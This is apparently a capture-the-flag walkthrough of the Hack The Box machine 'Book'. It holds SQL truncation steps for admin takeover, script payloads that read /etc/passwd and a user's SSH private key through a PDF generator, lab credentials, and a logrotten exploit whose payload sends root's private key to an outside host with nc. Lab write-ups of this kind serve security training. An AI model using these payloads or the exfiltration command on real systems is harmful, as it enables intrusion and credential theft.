Enumeration

Hostname : book.htb

1. nmap

   # Nmap 7.92 scan initiated Tue Jun 21 06:08:40 2022 as: nmap -sC -sV -T3 -oA nmap-tcp-all-ports.txt -p- -iL ip.txt
   Nmap scan report for 10.129.95.163 (10.129.95.163)
   Host is up (0.075s latency).
   Not shown: 65533 closed tcp ports (reset)
   PORT   STATE SERVICE VERSION
   22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
   | ssh-hostkey:
   |   2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
   |   256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
   |_  256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
   80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
   | http-cookie-flags:
   |   /:
   |     PHPSESSID:
   |_      httponly flag not set
   |_http-title: LIBRARY - Read | Learn | Have Fun
   |_http-server-header: Apache/2.4.29 (Ubuntu)
   Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
      
   Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
   # Nmap done at Tue Jun 21 06:09:18 2022 -- 1 IP address (1 host up) scanned in 38.12 seconds
   

2. Web Server

   A web server on TCP/80 is detected. Visiting the website http://10.129.95.163

   

   

Foothold

1. On performing basic testing, the login/signup form is found vulnerable to username enumeration and SQL Truncation vulnerability.

   

   Source: https://book.hacktricks.xyz/pentesting-web/sql-injection#sql-truncation-attack

   Testing for SQL Truncation

   1. An account was created with credentials: user1@mostwanted002.cf:Passw0rd!

   2. A second account was created, with credentials: user1@mostwanted002.cf malicious:Password!123Since there are checks implemented on the front-end to check for a valid email, a MITM Proxy (BurpSuite) can be used to intercept and modify the request.

      

   3. Going back to login page, when the username of first account and password of second accounts were used, it resulted in account access of first account. user1@mostwanted002.cf:Password!123

   Exploitation

   1. To exploit the flaw, a valid account/username is required. The web application is also vulnerable to username enumeration. On trying to signup with admin@book.htban alert is displayed saying “User Exits!”

      

   2. A new account with credentials

      admin@book.htb malicious:Password

      

   3. When logging in with the credentials admin@book.htb:Password, we are logged in as admin

      

      

   File upload functionality and Admin Panel (Server side XSS to LFI)

   1. A file upload functionality was found under the tab Collections(http://book.htb/collections.php)

      

   2. An admin panel was found at http://book.htb/admin

      

   3. Collections tab on admin panel has a server side PDF generation utility, which parsed the Title, Author and Link of books from database.

   4. To check for HTML injection, the form was submitted with <b>should be bold</b> as book title, and the contents were checked via admin panel.

   

   Exploitation

   1. It is found that the PDF generator is vulnerable to HTML content injection. To escalate further, JavaScript injection can be checked. The title <script>var x = new XMLHttpRequest();x.onload=function(){document.write(x.responseText)};x.open('GET','file:///etc/passwd');x.send();</script> should print the contents of file /etc/passwd from remote server.

      

   2. We find a user on the remote machine, reader. Using the same payload, and different file, we try extracting private SSH keys for reader if they exist.

      <script>var x = new XMLHttpRequest();x.onload=function(){document.write(x.responseText)};x.open('GET','file:///home/reader/.ssh/id_rsa');x.send();</script>
      

      

      The immediate problem is, the key is overflowing from the printable area. For that, we need to add additional javascript to reduce the font size. The document.style.fontSize = "x-small" can probably help to extract the complete key.

      <p id='ad'></p><script>var x = new XMLHttpRequest();x.onload=function(){document.getElementById('ad').style.fontSize="x-small";document.getElementById('ad').innerHTML = x.responseText;};x.open('GET','file:///home/reader/.ssh/id_rsa');x.send();</script>
      

      

   3. The key is saved in a file, permissions of the file are modified to 0600 to make it useable as SSH Key.

   4. Connecting via SSH to reader@book.htb with id_rsa as private key, we have a valid SSH Session on the remote target as user reader

      

Privilege Escalation

Enumeration

1. Downloading and launching [linpeas.sh](http://linpeas.sh) gave a couple of information:

   1. A CRON Job is being executed by root which uses logrotate and configuration /root/log.cfg
   2. The web server directory is /var/www/html, which contained db.php, having credentials for MySQL database. book_admin:I_Hate_Book_Reading
   3. From MySQL database, credentials for admin@book.htb were retrieved: admin@book.htb:Sup3r_S3cur3_P455

2. The credentials are not useful as they don’t work in any ways.

3. The logrotate functionality present here if found to be vulnerable to a race condition. We have write access on the log files in the folder /home/reader/backups/

   Source: https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition

Exploitation

1. Using the [logrotten](https://github.com/whotwagner/logrotten) exploit, we try to inject our payload of reverse shell to escalate our privileges to root.

   # This will require two seperate SSH Sessions
   # One to compile and execute logrotten exploit
   # Second to make changes to /home/reader/backups/access.log to trigger logrotate required for exploitation
      
   # Session 1
   gcc -o exploit logrotten.c
   echo 'cat /root/.ssh/id_rsa | /bin/nc 10.10.14.2 9090' > payloadfile
   ./exploit -p ./payloadfile /home/reader/backups/access.log
      
   # Session 2
   cat payloadfile > /home/reader/backups/access.log
      
   

Privilege Escalation was achieved and the remote host has been completely pwned/owned.